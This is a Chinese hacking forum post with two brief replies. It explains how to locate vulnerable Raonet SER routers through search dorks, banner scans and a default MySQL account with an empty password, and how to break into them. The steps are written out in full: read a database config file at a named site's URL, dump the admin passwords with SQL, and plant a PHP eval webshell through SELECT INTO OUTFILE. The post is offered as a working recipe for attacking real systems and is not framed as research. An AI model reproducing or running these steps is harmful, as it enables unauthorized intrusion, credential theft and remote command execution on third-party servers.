找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3030|回复: 2
打印 上一主题 下一主题

利用某路由器漏洞入侵国外站点

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:30:18 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
  寻找存在漏洞的路由器方法:% H1 I- Y0 f! D( d% m& {$ i+ i
8 }# z# i/ Z' o
1:google搜索'Raonet Subscriber Ethernet Router'
% k6 r& Y  S6 n) f8 F; R/ c0 b2 R1 G3 L6 P+ I/ R! ?. K
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
; y# y, b2 {; s2 h$ G, r+ j' L$ @1 c6 M+ y' i
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
" ]4 O  {2 _. U: D: \
6 y7 C+ c# D" v' Z! Z, T7 ^% g/ H! ]//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......$ }3 t; K) x0 X8 m6 t3 V& A
* h% B0 M2 M% Q: ^% f# O

" X! L& P7 u' |3 J. i
+ d$ X# G& m) I$ q' q入侵步骤:
; z% t) ?# {& Y+ p% {$ C
: K/ Q, A. ]* S. G$ Q! m4 K1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
7 J, H; A: P( X( W, D6 g" {+ N3 z: w& ~' ^) F0 ]) n
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
/ t% Y1 b: a- X/ {( A3:得到密码后连接,查看GUI管理密码:0 s& K( i, Y' g4 m
use ser_500# W- |& L) R$ p9 ^
select id,passwd from user;) d, \+ `7 T  v3 [1 v% }
4:通过数据库写入webshell,执行命令:( ~6 G8 T( @$ X+ @) I! L: D2 d) F
use mysql;; c9 H* l) {0 U* Z2 P- E
create table ok(cmd TEXT);1 N8 i; d$ c! I
insert into ok values("<?php @eval($_POST[cmd])?>");! Q- x0 e6 V7 s' @" t/ k  P) ]
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";9 m7 g/ v1 [4 Z  R8 W6 Z
drop table ok;
1 {; d* P+ \0 N9 L8 ?# G& O1 p4 f! `9 ]
5:连接后门shell.php 5 R8 q6 _: G' D# _% a
% p4 ?* l# @6 ]
6. 搞定!
; V) z) t2 A( s; m
! G( ]/ w) \8 D/ @3 A7 l/ h
回复

使用道具 举报

板凳
发表于 2013-7-29 12:07:54 | 只看该作者
不错哦,黑服务器补洞。。
回复 支持 反对

使用道具 举报

沙发
发表于 2013-7-27 20:06:50 | 只看该作者
这个后果可以很严重的说
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表